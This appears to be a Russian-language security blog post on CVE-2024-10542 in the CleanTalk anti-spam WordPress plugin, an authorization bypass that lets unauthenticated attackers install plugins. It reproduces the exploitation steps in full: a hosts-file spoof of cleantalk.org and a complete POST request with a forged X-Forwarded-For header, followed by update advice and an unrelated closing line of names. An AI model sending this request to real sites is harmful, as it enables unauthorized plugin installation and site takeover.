
WordPress Spam protection, AntiSpam, FireWall by CleanTalk Plugin <= 6.43.2 уязвим для неаутентифицированной произвольной установки плагинов
Информация, предоставленная в этом документе касательно CVE-2024-10542, предназначена только для обучения и образования. Мы не поощряем и не разрешаем использование этой информации в любых вредоносных целях, включая, но не ограничиваясь, эксплуатацию, вмешательство в систему или другие незаконные действия.
В условиях всё более сложного цифрового ландшафта обеспечение безопасности веб-сайтов является первостепенной задачей для многих владельцев сайтов. Недавно были обнаружены две критические уязвимости, представляющие значительную угрозу для сайтов на WordPress. Эти уязвимости затрагивают известный плагин CleanTalk, который обеспечивает защиту от спама, антиспам-меры и брандмауэр. Что делает эту ситуацию ещё более срочной? Давайте разберёмся подробнее! Две уязвимости, отслеживаемые как CVE-2024-10542 и CVE-2024-10781, могут позволить неаутентифицированным злоумышленникам устанавливать и активировать вредоносные плагины на уязвимых сайтах. Это не только ставит под угрозу репутацию сайта, но и открывает дверь для выполнения удалённого кода. При оценке CVSS 9.8 из 10 очевидно, что эти уязвимости относятся к категории чрезвычайно опасных. Согласно Wordfence, обе уязвимости связаны с проблемой обхода авторизации, которая может позволить злоумышленнику устанавливать и активировать произвольные плагины. Это, в свою очередь, может открыть путь к удалённому выполнению кода, если активированный плагин сам по себе уязвим.
Прежде всего злоумышленники устанавливают файл hosts в своей операционной системе:
127.0.0.1 cleantalk.org
после чего они отправляют запрос следующего вида
POST /?plugin=wp-hooks-finder/index.php HTTP/1.1
Host: wordpress.test
Content-Length: 56
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://wordpress.test
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close
spbc_remote_call_action=install_plugin&plugin_name=apbct
Кибербезопасность — это ответственность каждого владельца сайта. Поддерживая плагины в актуальном состоянии и сохраняя бдительность в отношении потенциальных уязвимостей, мы можем защитить наши сайты от вредоносных атак. Убедитесь, что вы обновили CleanTalk до последней версии и регулярно проверяйте другие плагины для обеспечения максимальной безопасности. Помните: небольшие шаги могут предотвратить серьёзные катастрофы!
Allah, Muhammad SAW, mikemyers, Markdown Monster, моя семья, вам?